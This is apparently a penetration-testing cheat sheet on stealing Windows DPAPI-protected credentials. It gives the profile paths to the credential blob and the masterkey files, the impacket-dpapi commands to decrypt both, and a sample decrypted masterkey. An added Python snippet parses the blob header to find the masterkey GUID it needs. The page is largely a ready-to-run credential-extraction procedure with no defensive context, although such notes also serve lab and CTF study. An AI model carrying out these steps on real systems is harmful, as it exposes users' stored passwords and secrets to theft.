CRD - DPAPI Credentials
1.0 Blob and Masterkey
1.1 Blob
You can find the blob file in the user's profile directory:
%appdata%\microsoft\credentials\
For example, the blob is named: C8D69EBE9A43E9DEBF6B5FBD48B521B9
Download the file to your local machine.
1.2 Masterkey
The masterkey is located in the protected directory:
%appdata%\microsoft\protect\<SID>
In this case, the file is named: 556a2412-1275-4ccf-b721-e6a0b4f90407
Download this file, too.
2.0 Decrypting
2.1 Decrypting the masterkey
impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password p4ss -sid S-1-5-21-1487982659-1829050783-2281216199-1107
You will get the plaintext masterkey as a result, e.g.:
0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
2.2 Decrypting the blob
impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
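Sections 1.1 and 1.2 pair a blob with a masterkey file by name; the blob header itself records which masterkey GUID it was protected with. The following is an added example, not part of the original page: the function names are hypothetical, the header layout is an assumption stated in the docstring, and the sample blob is constructed (headers plus zero padding, no real secret).

```python
import struct
import uuid

# Well-known GUID of the DPAPI provider, present at the start of a DPAPI blob.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
FILE_HEADER = "<III"        # version, blob size, unknown
BLOB_HEADER = "<I16sI16s"   # version, provider GUID, masterkey version, masterkey GUID


def masterkey_guid(cred_file: bytes) -> uuid.UUID:
    """Return the GUID of the masterkey that protects a credential file.

    Assumed layout (little-endian): a 12-byte file header followed by the
    DPAPI blob, whose first 40 bytes match BLOB_HEADER.
    """
    need = struct.calcsize(FILE_HEADER) + struct.calcsize(BLOB_HEADER)
    if len(cred_file) < need:
        raise ValueError("too short for a credential file")
    _version, size, _unknown = struct.unpack_from(FILE_HEADER, cred_file, 0)
    blob = cred_file[struct.calcsize(FILE_HEADER):]
    if size > len(blob):
        raise ValueError(f"truncated: header claims {size} bytes, got {len(blob)}")
    _bver, provider, _mkver, mk = struct.unpack_from(BLOB_HEADER, blob, 0)
    # GUIDs are stored in Windows mixed-endian form, hence bytes_le.
    if uuid.UUID(bytes_le=provider) != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob (unexpected provider GUID)")
    return uuid.UUID(bytes_le=mk)


def build_sample(mk_guid: str) -> bytes:
    """Constructed sample file: valid headers, zero-filled body."""
    blob = struct.pack(BLOB_HEADER, 1, DPAPI_PROVIDER.bytes_le, 1,
                       uuid.UUID(mk_guid).bytes_le) + b"\x00" * 32
    return struct.pack(FILE_HEADER, 1, len(blob), 0) + blob


if __name__ == "__main__":
    # Masterkey file name taken from section 1.2 of this page.
    sample = build_sample("556a2412-1275-4ccf-b721-e6a0b4f90407")
    print("blob needs masterkey file:", masterkey_guid(sample))
```

The returned GUID is the file name to look for under the protect\<SID> directory before running the masterkey step.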